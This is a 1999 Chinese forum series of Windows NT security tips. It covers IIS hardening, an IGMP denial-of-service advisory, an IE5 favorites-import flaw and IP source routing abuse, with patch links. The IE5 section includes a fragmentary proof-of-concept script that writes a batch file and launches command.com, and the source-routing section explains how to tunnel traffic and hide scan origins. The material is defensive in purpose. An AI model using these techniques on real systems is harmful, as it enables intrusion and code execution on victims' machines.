NT安全技术Tips(5)

 禁止”Parent Paths”，也就是不让别人用”..”来访问你的上一层目录，设置办法：站点属性->主目录->配置->应用程序选项->启用上层目录，将它disable就可以了。



HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters 的 SSIEnableCmdDirective设置为1禁止远程调用command shell。

本文根据国外文章改编而成，根据国内的情况略有删除，如果你有什么不同的意见请mail to: adam2000@21cn.com ，同时也欢迎到 http://www.chinaasp.com 的安全技术论坛与我讨论。

NT安全技术Tips之十三

关键词：NT, 计算机安全

(原文加贴于安全技术版1999年9月6日)

向Windows 95,98和NT的机器发送IGMP碎包，可能导致机器中断正常操作，此现象在95和98的机器上会使机器变慢甚至死机，而在NT上，虽然也存在这个问题，但类似的成功的机会不是很大。

易受攻击的平台： Microsoft Windows 95 Microsoft Windows 98

Microsoft Windows 98 Second Edition

Microsoft Windows NT Workstation 4.0 Microsoft Windows NT Server 4.0

Microsoft Windows NT Server 4.0, Enterprise Edition

Microsoft Windows NT Server 4.0, Terminal Server Edition

微软在9月3日发布了一系列的补丁，地址如下：

Windows 95:

This patch will be available shortly Windows 98:

http://www.microsoft.com/windows98/downloads/corporate.asp

Windows NT Workstation 4.0; Windows NT Server 4.0; Windows NT Server, Enterprise Edition:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/IGMP-fix/

Windows NT Server 4.0, Terminal Server Edition:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40TSE/hotfixes-postSP5/IGMP-fix/

(原文加贴于安全技术版1999年9月12日)

你在你的NT服务器安装并使用了IE5了吗？

最近微软公布了一个新的漏洞是关于IE 5中的一个危险的东西！

这个危险的东西实际上就是IE5中的一个函数！

这个函数就是window.external.ImportExportFavorites()。

请大家看看下面这个sample,

In a HTML file:

------------------------------------------------------------------

------------------------------------------------------------------

In the imported file (fav.imp), residing on a samba or Windows server without authentication:

-------------------------------------------------------------------

ActiveXObject(\\'Scripting.FileSystemObject\\');a=f.CreateTextFile(\\'C:\\\\\\\\GTEST.BAT\\',true);a.WriteLine(\\'echo

Hi\\');a.WriteLine(\\'pause\\');a.close();alert(\\'File C:\\\\\\\\GTEST.BAT created\\');window.close();'));\LAST_VISIT=\

LAST_MODIFIED=\

ActiveXObject(\\'WScript.Shell\\');a.run(\\'c:\\\\command.com\\');alert(\\'Program started\\');window.close()'));\

LAST_VISIT=\

-------------------------------------------------------------------

To see the effect start c:\\fav.hta (it may be placed in the StartUp folder and executed automatically)

这个玩意可以由一个居心叵测的家伙通过竹叶或者email向你发威，所以对于个人用户和服务器来说都是一个必需考虑的漏洞！

因为他可以写你的文件，所以他可以覆盖你的c:\\command.com

其中的害处大家心里都有数，我就不说了 ！！！

而微软大爷给我们的解决方案就是disable你的脚本执行,该死的M$,没办法!!!

(原文加贴于安全技术版1999年9月21日) Windows IP Source Routing Vulnerability

每个版本的NT都存在这样的漏洞，不过如果你装了SP5的话可以通过修改注册表来完成：

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\DisableIPSourceRouting

如果你是9x的使用者，那还得等等微软的大爷们给你做补丁。

技术方面的细节：

Every IP stack is required to implement IP options, although they may or may not appear in each IP datagram. Options are variable in length, and generally contain a type, length and data associated with the option. The option type is divided into three fields:

the copied flag, option class and the option number. The copied

flag indicates that this option is copied into all fragments onfragmentation. The source route option provides routing information for gateways in the delivery of a datagram to its destination. There are two variations loose and strict routes. The loose source route (LSRR) allows any number of intermediate gateways to reach the next address in the route. The strict source route (SSRR) requires the next address in the source route to be on a directly connected

network, otherwise the delivery of the datagram can not becompleted. The source route options have a variable length, containing a series of IP addresses and an offset pointer indicating the next IP address to be processed. A source routed datagram completes its delivery when the offset pointer points beyond the last field, ie the pointer is greater than the length, and the address in

the destination address has been reached. RFC 1122 states the option as received must be passed up to the transport layer (or to ICMP message processing).

It is a common security measure to disable IP source routing. In this situation, if a source routed packet attempts to use a

secure host as an intermediate router or to deliver its data to that hosts application layer then the datagram should be dropped,

optionally delivering an ICMP unreachable - source route failed. It is important to note that the datagram would be dropped at the network layer prior to IP reassembly and before data is passed to the application layer.

As with other operating systems (when configured to deny source routed packets), if a source routed datagram attempts to use a Windows host as an intermediate router, an ICMP source route failed message is sent. This implies that the offset pointer is not greater than the length and the destination IP address has not been reached.

When a source routed datagram completes its delivery, the offset

pointer is greater than the length and the destination has been reached. If a specially crafted IP packet, with source route options, has the offset pointer set greater than the length, Windows TCP/IP stacks will accept the source routed datagram (rather than dropping it), and pass the data to the application layer for

processing. The source route is reversed, delivering the reply to this datagram to the first host in the reversed route. Since the source route can be manipulated by an attacker, the first host in the reversed source route can be set to a host on the

second network (accessible via the second interface, i.e. theinternal network). As a result, it is possible to pass data through all Windows stacks with two network interfaces.

In addition to tunneling data, there are two scenarios which can allow an intruder to obtain information about the remote network while obscuring their origin.

The first allows any Windows host to be used to identify

non-Windows hosts that have source routing enabled. A source routed datagram is created with a false source address, containing the true source address of the request and the address of a host to be scanned in the option data. Delivering this datagram, with the correct offset, to a Windows host results in the route being reversed and routed to the scanned host. If this host has source routing enabled the true source of the request will then see a response returned.

Secondly, by utilizing the above source routing technique, and masking their source address in the IP header, it is possible to

scan a Windows host for open ports using standard port scanningtechniques.

实际上这个漏洞很久以前就有人提出过，我也想过很久，可具体的攻击方法我还没有能够实现，大家还是找个微软的补丁打打，以免以后遭到攻击（也许有人已经开始使用这种方法攻击你的服务器了哦！）。

补丁地址：

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/Hotfixes-PostSP5/Spoof-fix

NT安全技术Tips之十四

关键词：NT, 计算机安全

(原文加贴于安全技术版1999年10月2日) 关于共享

最近国内流行扫描NT的东西，网上NT的帐号一览无遗，如果你NT上的帐号管理松懈的话，如果你的硬盘everyone安全控制的共享还没删掉的话，我要问的是，你为什么还不辞职？？？

最近不少人问到共享的问题，特别是关于一些为管理而设置的特别的共享，很多人心存疑问，ADAM特意整理了一篇关于这个方面的东西，以飨观众，希望大家多多捧场。

计算机的共享资源包括被用户和管理员共享的那些资源（如目录），加上由系统 创建的任何特殊共享资源。

根据被管理计算机的配置情况，在 Windows NT 提供的计算机共享资源列表中可

能出现部分或所有下列特殊共享。这些共享是由系统创建的。在大多数情况下不